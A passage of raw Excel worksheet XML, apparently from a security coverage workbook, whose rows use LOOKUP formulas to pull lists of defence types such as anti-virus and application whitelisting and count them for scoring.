      <c r="F142" s="50"/>
      <c r="G142" s="19"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="16" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="45" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C143" s="17">
        <v>0</v>
      </c>
      <c r="D143" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E143" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F143" s="50"/>
      <c r="G143" s="19"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="16" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="45" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C144" s="17">
        <v>0</v>
      </c>
      <c r="D144" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E144" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="50"/>
      <c r="G144" s="19"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="16" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="45" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C145" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D145" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E145" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F145" s="50"/>
      <c r="G145" s="19"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="16" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="45" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C146" s="17">
        <v>0</v>
      </c>
      <c r="D146" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E146" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="50"/>
      <c r="G146" s="19"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="16" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="45" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C147" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D147" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E147" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="50"/>
      <c r="G147" s="19"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="16" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="45" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C148" s="17">
        <v>0</v>
      </c>
      <c r="D148" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E148" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F148" s="50"/>
      <c r="G148" s="19"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="16" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="45" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Signature-based detection,Network intrusion detection system</v>
      </c>
      <c r="C149" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D149" s="45">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E149" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F149" s="50"/>
      <c r="G149" s="19"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="16" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="45" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D150" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="50"/>
      <c r="G150" s="19"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="16" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="45" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D151" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="50"/>
      <c r="G151" s="19"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="16" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="45" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C152" s="17">
        <v>0</v>
      </c>
      <c r="D152" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E152" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F152" s="50"/>
      <c r="G152" s="19"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="16" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="45" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:H)</f>
        <v>Application whitelisting,Process whitelisting,Whitelisting by file name or path</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D153" s="45">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="50"/>
      <c r="G153" s="19"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="16" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="45" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C154" s="17">
        <v>0</v>
      </c>
      <c r="D154" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E154" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F154" s="50"/>
      <c r="G154" s="19"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="16" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="45" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C155" s="17">
        <v>0</v>
      </c>
      <c r="D155" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E155" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F155" s="50"/>
      <c r="G155" s="19"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="16" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="45" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C156" s="17">
        <v>0</v>
      </c>
      <c r="D156" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E156" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F156" s="50"/>
      <c r="G156" s="19"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="16" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="45" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C157" s="17">
        <v>0</v>
      </c>
      <c r="D157" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E157" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F157" s="50"/>
      <c r="G157" s="19"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="16" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="45" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C158" s="17">
        <v>0</v>
      </c>
      <c r="D158" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E158" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="50"/>
      <c r="G158" s="19"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="16" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="45" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C159" s="17">
        <v>100</v>
      </c>
      <c r="D159" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E159" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F159" s="50"/>
      <c r="G159" s="19"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="16" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="45" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C160" s="17">
        <v>0</v>
      </c>
      <c r="D160" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E160" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F160" s="50"/>
      <c r="G160" s="19"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="16" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="45" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C161" s="17">
        <v>0</v>
      </c>
      <c r="D161" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E161" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F161" s="50"/>
      <c r="G161" s="19"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="16" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="45" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C162" s="17">
        <v>0</v>
      </c>
      <c r="D162" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E162" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F162" s="50"/>
      <c r="G162" s="19"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="16" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="45" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C163" s="17">
        <v>0</v>
      </c>
      <c r="D163" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E163" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F163" s="50"/>
      <c r="G163" s="19"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="16" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="45" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C164" s="17">
        <v>0</v>
      </c>
      <c r="D164" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E164" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F164" s="50"/>
      <c r="G164" s="19"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="16" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="45" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E165" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="50"/>
      <c r="G165" s="19"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="16" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="45" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C166" s="17">
        <v>0</v>
      </c>
      <c r="D166" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E166" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F166" s="50"/>
      <c r="G166" s="19"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="16" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="45" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C167" s="17">
        <v>0</v>
      </c>
      <c r="D167" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E167" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F167" s="50"/>
      <c r="G167" s="19"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="16" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="45" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C168" s="17">
        <v>0</v>
      </c>
      <c r="D168" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E168" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="50"/>
      <c r="G168" s="19"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="16" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="45" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C169" s="17">
        <v>0</v>
      </c>
      <c r="D169" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E169" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F169" s="50"/>
      <c r="G169" s="19"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="16" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="45" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C170" s="17">
        <v>0</v>
      </c>
      <c r="D170" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E170" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="50"/>
      <c r="G170" s="19"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="16" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="45" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C171" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D171" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E171" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="50"/>
      <c r="G171" s="19"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="16" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="45" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C172" s="17">
        <v>0</v>
      </c>
      <c r="D172" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E172" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F172" s="50"/>
      <c r="G172" s="19"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="16" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="45" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C173" s="17">
        <v>0</v>
      </c>
      <c r="D173" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E173" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F173" s="50"/>
      <c r="G173" s="19"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="16" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="45" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C174" s="17">
        <v>0</v>
      </c>
      <c r="D174" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E174" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F174" s="50"/>
      <c r="G174" s="19"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="16" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="45" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C175" s="17">
        <v>0</v>
      </c>
      <c r="D175" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E175" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F175" s="50"/>
      <c r="G175" s="19"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="16" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="45" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C176" s="17">
        <v>0</v>
      </c>
      <c r="D176" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E176" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F176" s="50"/>
      <c r="G176" s="19"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="16" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="45" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C177" s="17">
        <v>0</v>
      </c>
      <c r="D177" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E177" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F177" s="50"/>
      <c r="G177" s="19"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="16" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="45" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C178" s="17">
        <v>0</v>
      </c>
      <c r="D178" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E178" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F178" s="50"/>
      <c r="G178" s="19"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="16" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="45" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C179" s="17">
        <v>0</v>
      </c>
      <c r="D179" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E179" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F179" s="50"/>
      <c r="G179" s="19"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="16" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="45" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C180" s="17">
        <v>0</v>
      </c>
      <c r="D180" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E180" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F180" s="50"/>
      <c r="G180" s="19"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="16" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="45" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C181" s="17">
        <v>0</v>
      </c>
      <c r="D181" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E181" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F181" s="50"/>
      <c r="G181" s="19"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="16" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="45" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C182" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D182" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E182" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F182" s="50"/>
      <c r="G182" s="19"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="16" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="45" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C183" s="17">
        <v>0</v>
      </c>
      <c r="D183" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E183" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F183" s="50"/>
      <c r="G183" s="19"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="16" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="45" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C184" s="17">
        <v>100</v>
      </c>
      <c r="D184" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E184" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F184" s="50"/>
      <c r="G184" s="19"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="16" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="45" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C185" s="17">
        <v>0</v>
      </c>
      <c r="D185" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="50"/>
      <c r="G185" s="19"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="16" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="45" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C186" s="17">
        <v>0</v>
      </c>
      <c r="D186" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E186" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F186" s="50"/>
      <c r="G186" s="19"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="16" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="45" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C187" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D187" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E187" s="45">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F187" s="50"/>
      <c r="G187" s="19"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="16" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="45" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C188" s="17">
        <v>0</v>
      </c>
      <c r="D188" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E188" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F188" s="50"/>
      <c r="G188" s="19"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="16" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="45" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C189" s="17">
        <v>0</v>
      </c>
      <c r="D189" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E189" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F189" s="50"/>
      <c r="G189" s="19"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="16" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="45" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C190" s="17">
        <v>0</v>
      </c>
      <c r="D190" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E190" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F190" s="50"/>
      <c r="G190" s="19"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="16" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="45" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C191" s="17">
        <v>0</v>
      </c>
      <c r="D191" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E191" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F191" s="50"/>
      <c r="G191" s="19"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="16" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="45" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C192" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D192" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E192" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F192" s="50"/>
      <c r="G192" s="19"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="16" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="45" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C193" s="17">
        <v>0</v>
      </c>
      <c r="D193" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E193" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F193" s="50"/>
      <c r="G193" s="19"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="16" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="45" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C194" s="17">
        <v>0</v>
      </c>
      <c r="D194" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E194" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F194" s="50"/>
      <c r="G194" s="19"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="16" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="45" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C195" s="17">
        <v>0</v>
      </c>
      <c r="D195" s="45">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E195" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F195" s="50"/>
      <c r="G195" s="19"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="16" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="45" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C196" s="17">
        <v>0</v>
      </c>
      <c r="D196" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E196" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F196" s="50"/>
      <c r="G196" s="19"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="16" t="s">
        <v>319</v>
      </c>
